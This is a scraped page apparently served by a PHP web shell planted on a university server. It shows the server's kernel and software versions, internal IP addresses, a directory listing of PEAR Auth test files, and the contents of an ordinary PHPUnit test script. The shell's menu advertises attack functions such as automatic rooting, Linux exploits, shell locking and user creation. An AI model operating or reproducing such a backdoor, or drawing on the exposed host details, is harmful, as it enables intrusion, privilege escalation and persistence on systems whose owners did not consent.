Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
lib /
php /
test /
Auth /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
AllTests.php
1.14
KB
-rw-r--r--
auth_container_db_options.php
583
B
-rw-r--r--
auth_container_file_options.php
114
B
-rw-r--r--
auth_container_imap_options.php
160
B
-rw-r--r--
auth_container_mdb2_options.php
554
B
-rw-r--r--
auth_container_mdb_options.php
554
B
-rw-r--r--
auth_container_pop3a_options.php
129
B
-rw-r--r--
auth_container_pop3_options.php
165
B
-rw-r--r--
bug8735.passwd
19
B
-rw-r--r--
bug8735.phpt
883
B
-rw-r--r--
DBContainer.php
747
B
-rw-r--r--
DBLiteContainer.php
823
B
-rw-r--r--
FileContainer.php
518
B
-rw-r--r--
IMAPContainer.php
696
B
-rw-r--r--
MDB2Container.php
756
B
-rw-r--r--
MDBContainer.php
820
B
-rw-r--r--
mysql_test_db.sql
163
B
-rw-r--r--
POP3aContainer.php
522
B
-rw-r--r--
POP3Container.php
518
B
-rw-r--r--
TestAuthContainer.php
4.67
KB
-rw-r--r--
tests.php
1.33
KB
-rw-r--r--
users
1
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tests.php
<?php include_once 'Auth.php'; include_once 'TestAuthContainer.php'; include_once 'FileContainer.php'; include_once 'DBContainer.php'; include_once 'DBLiteContainer.php'; include_once 'MDBContainer.php'; include_once 'MDB2Container.php'; include_once 'POP3Container.php'; include_once 'POP3aContainer.php'; include_once 'IMAPContainer.php'; include_once 'PHPUnit.php'; function error($err){ print "Error\n"; print "Code:".trim($err->getCode())."\n"; print "Message:".trim($err->getMessage())."\n"; #print "UserInfo:".trim($err->getUserInfo())."\n"; #print "DebugInfo:".trim($err->getDebugInfo())."\n"; } #error_reporting(0); PEAR::setErrorHandling(PEAR_ERROR_PRINT, "\nPear Error:%s \n"); #PEAR::setErrorHandling(PEAR_ERROR_CALLBACK, "error"); set_time_limit(0); $suite = new PHPUnit_TestSuite(); // File Container #$suite->addTest(new PHPUnit_TestSuite('IMAPContainer')); $suite->addTest(new PHPUnit_TestSuite('FileContainer')); $suite->addTest(new PHPUnit_TestSuite('DBContainer')); //$suite->addTest(new PHPUnit_TestSuite('DBLiteContainer')); // MDB Container $suite->addTest(new PHPUnit_TestSuite('MDBContainer')); // MDB2 Container $suite->addTest(new PHPUnit_TestSuite('MDB2Container')); // POP3 Container $suite->addTest(new PHPUnit_TestSuite('POP3Container')); $result = PHPUnit::run($suite); echo $result->toString(); ?>
Close